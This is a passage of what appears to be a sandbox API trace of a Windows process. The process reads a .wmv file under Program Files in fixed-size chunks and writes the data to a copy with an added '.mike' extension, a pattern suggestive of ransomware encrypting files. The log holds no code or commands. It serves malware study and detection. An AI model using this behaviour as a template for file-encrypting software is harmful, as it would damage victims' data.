lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0063.535] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.535] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.535] GetFileType (hFile=0x288) returned 0x1 [0063.535] GetFileType (hFile=0x288) returned 0x1 [0063.535] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x294220 [0063.535] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0063.535] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.535] GetFileType (hFile=0x288) returned 0x1 [0063.535] GetFileType (hFile=0x288) returned 0x1 [0063.536] SetFilePointer (in: hFile=0x288, lDistanceToMove=2713600, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x296800 [0063.536] ReadFile (in: hFile=0x288, lpBuffer=0x2249044, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2249044*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0063.537] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.537] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.537] GetFileType (hFile=0x288) returned 0x1 [0063.537] GetFileType (hFile=0x288) returned 0x1 [0063.537] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x296a20 [0063.538] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0063.538] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.538] GetFileType (hFile=0x288) returned 0x1 [0063.538] GetFileType (hFile=0x288) returned 0x1 [0063.538] SetFilePointer (in: hFile=0x288, lDistanceToMove=2723840, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x299000 [0063.538] ReadFile (in: hFile=0x288, lpBuffer=0x2256074, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2256074*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0063.539] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.539] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.539] GetFileType (hFile=0x288) returned 0x1 [0063.539] GetFileType (hFile=0x288) returned 0x1 [0063.539] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x299220 [0063.540] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0063.540] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.540] GetFileType (hFile=0x288) returned 0x1 [0063.540] GetFileType (hFile=0x288) returned 0x1 [0063.540] SetFilePointer (in: hFile=0x288, lDistanceToMove=2734080, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x29b800 [0063.540] ReadFile (in: hFile=0x288, lpBuffer=0x22630a4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22630a4*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0063.542] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.542] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.542] GetFileType (hFile=0x288) returned 0x1 [0063.542] GetFileType (hFile=0x288) returned 0x1 [0063.542] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x29ba20 [0063.542] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0063.542] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.543] GetFileType (hFile=0x288) returned 0x1 [0063.543] GetFileType (hFile=0x288) returned 0x1 [0063.543] SetFilePointer (in: hFile=0x288, lDistanceToMove=2744320, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x29e000 [0063.543] ReadFile (in: hFile=0x288, lpBuffer=0x22700d4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22700d4*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0063.544] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.544] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.544] GetFileType (hFile=0x288) returned 0x1 [0063.544] GetFileType (hFile=0x288) returned 0x1 [0063.544] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x29e220 [0063.545] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0063.545] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.545] GetFileType (hFile=0x288) returned 0x1 [0063.545] GetFileType (hFile=0x288) returned 0x1 [0063.545] SetFilePointer (in: hFile=0x288, lDistanceToMove=2754560, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2a0800 [0063.545] ReadFile (in: hFile=0x288, lpBuffer=0x227d104, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x227d104*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0063.546] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.546] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.546] GetFileType (hFile=0x288) returned 0x1 [0063.546] GetFileType (hFile=0x288) returned 0x1 [0063.546] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2a0a20 [0063.547] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0063.547] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.547] GetFileType (hFile=0x288) returned 0x1 [0063.547] GetFileType (hFile=0x288) returned 0x1 [0063.547] SetFilePointer (in: hFile=0x288, lDistanceToMove=2764800, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2a3000 [0063.547] ReadFile (in: hFile=0x288, lpBuffer=0x228a134, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x228a134*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0063.548] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.549] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.549] GetFileType (hFile=0x288) returned 0x1 [0063.549] GetFileType (hFile=0x288) returned 0x1 [0063.549] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2a3220 [0063.549] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0063.549] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.549] GetFileType (hFile=0x288) returned 0x1 [0063.549] GetFileType (hFile=0x288) returned 0x1 [0063.549] SetFilePointer (in: hFile=0x288, lDistanceToMove=2775040, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2a5800 [0063.549] ReadFile (in: hFile=0x288, lpBuffer=0x2297164, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2297164*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0063.551] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.551] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.551] GetFileType (hFile=0x288) returned 0x1 [0063.551] GetFileType (hFile=0x288) returned 0x1 [0063.551] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2a5a20 [0063.551] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0063.551] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.551] GetFileType (hFile=0x288) returned 0x1 [0063.551] GetFileType (hFile=0x288) returned 0x1 [0063.552] SetFilePointer (in: hFile=0x288, lDistanceToMove=2785280, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2a8000 [0063.552] ReadFile (in: hFile=0x288, lpBuffer=0x22a4194, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22a4194*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0063.553] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.553] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.553] GetFileType (hFile=0x288) returned 0x1 [0063.553] GetFileType (hFile=0x288) returned 0x1 [0063.553] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2a8220 [0063.553] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0063.553] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.554] GetFileType (hFile=0x288) returned 0x1 [0063.554] GetFileType (hFile=0x288) returned 0x1 [0063.554] SetFilePointer (in: hFile=0x288, lDistanceToMove=2795520, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2aa800 [0063.554] ReadFile (in: hFile=0x288, lpBuffer=0x22b11c4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22b11c4*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0063.555] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.555] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.555] GetFileType (hFile=0x288) returned 0x1 [0063.555] GetFileType (hFile=0x288) returned 0x1 [0063.555] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2aaa20 [0063.556] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0063.556] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.556] GetFileType (hFile=0x288) returned 0x1 [0063.556] GetFileType (hFile=0x288) returned 0x1 [0063.556] SetFilePointer (in: hFile=0x288, lDistanceToMove=2805760, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2ad000 [0063.556] ReadFile (in: hFile=0x288, lpBuffer=0x22be1f4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22be1f4*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0063.557] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.557] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.558] GetFileType (hFile=0x288) returned 0x1 [0063.558] GetFileType (hFile=0x288) returned 0x1 [0063.558] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2ad220 [0063.558] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0063.558] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.558] GetFileType (hFile=0x288) returned 0x1 [0063.558] GetFileType (hFile=0x288) returned 0x1 [0063.558] SetFilePointer (in: hFile=0x288, lDistanceToMove=2816000, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2af800 [0063.558] ReadFile (in: hFile=0x288, lpBuffer=0x22cb224, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22cb224*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0063.560] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.560] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 